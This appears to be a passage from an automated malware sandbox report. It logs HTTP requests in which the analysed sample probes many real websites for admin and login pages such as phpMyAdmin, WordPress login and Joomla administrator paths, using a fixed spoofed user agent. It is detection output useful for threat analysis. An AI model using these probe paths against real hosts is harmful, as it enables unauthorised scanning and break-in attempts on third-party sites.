Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=i3lvqgq0ufurmkbj7l8g7oodcfvqs85sUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://eskimo.ch/administrator/
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://acidvision.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://blauthlaw.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://att.com.au/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://popular.de/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=i3lvqgq0ufurmkbj7l8g7oodcfvqs85sUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://eskimo.ch/administrator/
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cfgteam.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://m-viper.de/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://strategicimpact.com.au/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=oj6p6lfvhecu1oc8sf9095ke5tUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.eyegage.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ksv-schwimmen.de/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://eskimo.ch/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
